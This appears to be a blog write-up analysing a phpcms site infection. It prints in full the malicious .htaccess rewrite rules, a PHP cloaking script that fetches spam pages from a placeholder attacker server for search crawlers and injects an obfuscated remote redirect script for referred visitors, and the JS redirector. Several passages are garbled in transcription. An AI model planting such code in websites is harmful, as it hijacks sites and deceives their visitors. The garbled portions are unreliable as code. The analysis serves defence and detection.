phpcms trojan that redirects visitors to illegal advertising pages — analysis and solution

1. A hidden .htaccess file was found in the site root; it contains the URL rewrite rules that perform the redirects. On Windows Server this file could be neither deleted nor renamed, and the attrib, del and cacls commands had no effect on it.

URLs of the following forms redirect to the advertising page:

/111safasf/index.html 

/<random characters>/index.html

/? = Werwerw zdsfasf

.htaccess content (roughly as follows):

# Analyst notes on the dropped .htaccess (directives kept exactly as transcribed).
# NOTE(review): the first line is garbled in this transcription; presumably `Options +FollowSymLinks`.
When Options + FollowSymLinks # symbolic link to access, whether to jump to the corresponding connection path
IndexIgnore * / *
RewriteEngine ON

# Both rules route the random-looking URLs listed above (/<word>/index.html and /xw<word>/)
# to a PHP script hidden under the images directory, passing the random part as ?id=.
# A .php file under images/, or any RewriteRule pointing at one, is itself an indicator
# worth alerting on when auditing a phpcms install.
RewriteRule ^(\w+)/index.html$ images/hot/页面.php?id=$1
RewriteRule ^xw(\w+)/$ images/hot/页面.php?id=$1

# if a directory or a file exists, use it directly
# NOTE: a RewriteCond only governs the RewriteRule that immediately follows it. Placed
# after both rules, with no rule after them, these two conditions have no effect here.
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d

# RewriteCond %{REQUEST_FILENAME} !-f  (if the request is not an existing file, apply the next RewriteRule)
# RewriteCond %{REQUEST_FILENAME} !-d  (if the request is not an existing directory, apply the next RewriteRule)

The PHP file that performs the redirect contains the following code:

? <PHP 

/*
 * Determine whether the request arrived via a link from another page (referrer check)
 */
function ISREF () 
{ 
    // Returns true when the request's HTTP_REFERER names one of the search engines
    // listed in $searray, i.e. the visitor arrived by clicking a search result.
    // NOTE(review): this function is garbled in transcription (tokens reordered and
    // capitalised); the intact isspider() below has the same structure and shows the
    // intended form. Capitalised entries such as "SO" and "Google" could never match a
    // lower-cased referrer, so they are presumably lower-case in the real sample.
    $ ISREF = false; 
    // No referrer header at all (presumably `!isset(...)`): not a search-engine visit.
    if (isset ($ _SERVER [! 'the HTTP_REFERER'])) { 
        return $ ISREF; 
    } 

    $ Referer = strtolower ($ _SERVER [ 'the HTTP_REFERER']); 
    // Engine names to look for; so, sogou, soso and haosou are Chinese search engines.
    $ searray = Array ( "baidu", "SO", "Sogou", "soso", "haosou" , "Google"); 
    // Substring match on the referrer (strpos !== false); the first hit wins.
    the foreach (AS $ $ searray value) { 
        ! IF (the strpos (Referer $, $ value) == to false) { 
            $ = ISREF to true; 
            BREAK; 
        } 
    } 
    return $ ISREF;
} 

/*
 * Determine whether the visitor is a search engine spider
 */
function isspider () 
{
    // Returns true when the User-Agent contains one of the crawler keywords below.
    // Analyst note: this is the cloaking switch. Crawler traffic is served the
    // attacker-supplied content (see the dispatch code at the bottom of the file);
    // everyone else falls through to the decoy 404 page.
    $isspider = false;
    // No isset() guard: a request without a User-Agent header raises a PHP notice here
    // (the referrer check above does guard its header).
    $http_user_agent = strtolower($_SERVER['HTTP_USER_AGENT']);
    // The UA is lower-cased but '360Spider' is not, so that entry can never match;
    // '360' and 'so' catch it anyway. 'so' is very broad: any UA containing "so" qualifies.
    $searray = array('baidu','360Spider','sogou','soso','360','so','google');
    foreach ($searray as $value) {
        if(strpos($http_user_agent, $value) !== false){
            $isspider = true;
            break;
        }
    }
    return $isspider;
}

function flushout($html)
{
    // Replace whatever has been buffered so far with $html and flush it to the client.
    // Analyst note: ob_clean() discards any output produced before this point, so the
    // crawler sees only the attacker's content. This function does NOT exit: execution
    // continues, and the decoy 404 markup after the closing ?> is still appended.
    //echo 1;
    //var_dump($html);
    ob_clean();
    ob_start();
    echo $html;
    ob_flush();
    ob_end_flush();
// NOTE(review): the two lines below, and the '}' / '{' around them, are a transcription
// splice. In the original source this '}' closes flushout(), and the getWebContent()
// header with its comment precedes the '{' on the following line.
function getWebContent ($ api)
// Fetch the body of the remote URL $api, trying three transports in turn.
}

{
    // Analyst note: this is the callback to the attacker's server. Every transport
    // sends the same fixed, very old browser User-Agent ("MSIE 6.0; Windows NT 5.2");
    // outbound HTTP from the web server process carrying that UA string is a useful
    // egress-log / proxy-log indicator for this infection.
    $c = '';
    // 1) Raw socket: hand-built HTTP/1.0 GET with a 10 s connect timeout.
    if (function_exists('fsockopen')) {
        $link = parse_url($api);
        // $link['path'] already begins with '/', so the request line below reads
        // "GET //path?query" — a quirk, not a feature. A URL without a query string
        // would also trigger an undefined-index notice/warning here.
        $query = $link['path'] . '?' . $link['query'];
        $host = strtolower($link['host']);
        $port = isset($link['port'])?$link['port']:80;
        $fp = fsockopen($host, $port, $errno, $errstr, 10);
        if ($fp) {
            $out = "GET /{$query} HTTP/1.0\r\n";
            $out .= "Host: {$host}\r\n";
            $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
            $out .= "Connection: Close\r\n\r\n";
            fwrite($fp, $out);
            // Skip the response headers: everything after the first blank line is body.
            $inheader = 1;
            $contents = "";
            while (!feof($fp)) {
                $line = fgets($fp, 4096);
                if ($inheader == 0) {
                    $contents .= $line;
                }
                if ($inheader && ($line == "\n" || $line == "\r\n")) {
                    $inheader = 0;
                }
            }
            fclose($fp);
            $c = $contents;
        }
    }
    // 2) curl fallback when the socket path returned nothing (15 s overall timeout).
    if (empty($c) && function_exists('curl_init') && function_exists('curl_exec')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $api);
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)");
        $c = curl_exec($ch);
        curl_close($ch);
    }
    // 3) Last resort: file_get_contents over the HTTP wrapper, errors hidden with @.
    if (empty($c) && ini_get('allow_url_fopen')) {
        $c = @file_get_contents($api);
    }
    // Nothing fetched (attacker server down or egress blocked): answer 404 and stop,
    // so the infection fails closed and simply looks like a missing file.
    if(empty($c)){
        header("HTTP/1.1 404 Not Found");
        exit;
    }
    //header("Content-Type: text/html; charset=gbk");
    return $c;
}

// Dispatch: cloak the response by visitor type.
$isspider = isspider();
//$isspider = true;
// Crawler: forward the victim site's host name and query string to the attacker's
// server and echo back whatever it returns (the SEO-poisoning "news page").
// Analyst note: the host name here was replaced with a placeholder ("spider server
// address") by the write-up's author; in a live sample the literal host at this
// line is the one to block at egress and to search web/proxy logs for.
if( $isspider ){
    $host = $_SERVER['HTTP_HOST'];
    $url = 'http://www.蜘蛛服务器地址.cn/44.php?host=' .$host . '&' . $_SERVER['QUERY_STRING'] ;
    $html = getWebContent( $url );
    //$html = iconv( 'gb2312' , 'utf-8' , $html );
    //flushout($url);
    flushout($html);
}

// PHP function names are case-insensitive, so isref() resolves to ISREF() above.
$isref = isref();
//    $isref = true;
// Human visitor arriving from a search engine: inject a remote script tag. The tag is
// assembled from string fragments so a naive grep for "<script" or "javascript" over
// the file finds nothing; the loaded p1.js is the redirector shown further down.
if( $isref ){
    $html = "<scri"."pt lang"."uage='jav"."as"."cri"."pt' src='http://www.蜘蛛服务器地址.com/p1.js'></sc"."ript><br/>";
    flushout($html);
}

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Decoy "404 - file or directory not found" page, wording resembling a stock server
     error page (gb2312). It follows the closing ?> of the PHP above, so an ordinary
     visitor (neither a crawler nor a search-engine referral) gets only this back,
     which makes the rewritten URL look like a dead link to anyone checking it by hand.
     The CSS below is garbled in this transcription and is kept as-is. -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"/>
<title>404 - 找不到文件或目录。</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;} 
{font-size h1 of: 2.4em; margin: 0; Color: #FFF;} 
H2 {font-size: 1.7em; margin: 0; Color: # CC0000;} 
H3 {font-size: 1.2em; margin: 10px 0 0 0; Color: # 000000;} 
#header {width: 96%; margin: 0 0 0 0; padding: 6px 6px 2% 2%; font-Family: "Trebuchet the MS", Verdana, Sans-serif; Color : #FFF; 
background-Color: # 555555;} 
#content {margin: 0 0 0 2%; position: relative;} 
.content-Container {background: #FFF; width: 96%; margin-Top: 8px; padding : 10px; position: relative;} 
-> 
</ style> 
</ head> 
<body> 
<div ID = "header"> <h1 of> server error </ h1 of> </ div> 
<div ID = "Content" > 
 <div class="content-container"><fieldset>
  <h2> 404 - file or directory. </ h2> 
  <h3> resource you are looking for might have been removed, the name has been changed or is temporarily unavailable. </ H3> 
 <

The page fetches its content from the attacker's server (44.php), passing the requested host and query string in the URL:

'http://www.<spider server address>.cn/44.php?host=' . $host . '&' . $_SERVER['QUERY_STRING'];

The attacker's server returns a randomly generated news page, which Baidu then crawls and indexes. When a user later opens that URL from a Baidu search result, the referrer check matches and the page redirects to an illegal website.

 

Below is the JS file that performs the redirect:

JS content

// Redirector loaded by the injected <script src=".../p1.js"> tag.
// The global js616_ guard keeps it from running twice if the tag is injected more than once.
if(typeof(js616_)=='undefined'){
    var js616_ = 'loaded';
    var js616dm = document.domain.toLowerCase();
    // Both branches below do the same three things: load a 51.la hit counter (apparently
    // so the operator can count victims), redirect this window after 1 s, and also try
    // to redirect the opener window via window.opener.navigate (a legacy IE-only API).
    // The qq.com domain test therefore appears to make no difference in this sample.
    // NOTE(review): the first branch is garbled in transcription ("});else{" is not valid
    // JS); the intact else-branch shows the intended code.
    // Detection: the counter id "19555119.js" and the setTimeout(...location.href...)
    // pattern are stable strings to search served or cached JS for.
    if(js616dm.indexOf('qq.com')!=-1){
        document.writeln('<script type="text/javascript" src="https://js.users.51.la/19555119.js"></script>');
        document.writeln("<script language=javascript>setTimeout(\"window.location.href='http://www.非法网址.com/'\",\"1000\");</script>");
        document.writeln("<script language=javascript>setTimeout(\"window.opener.navigate ( 'http:. // www illegal URL .com /') \ ", \" 1000 \ "); </ Script>" 
    });else{
        document.writeln('<script type="text/javascript" src="https://js.users.51.la/19555119.js"></script>');
        document.writeln("<script language=javascript>setTimeout(\"window.location.href='http://www.非法网址.com/'\",\"1000\");</script>");
        document.writeln("<script language=javascript>setTimeout(\"window.opener.navigate('http://www.非法网址.com/')\",\"1000\");</script>");
    }
}

 


Origin www.cnblogs.com/flymomo/p/11269389.html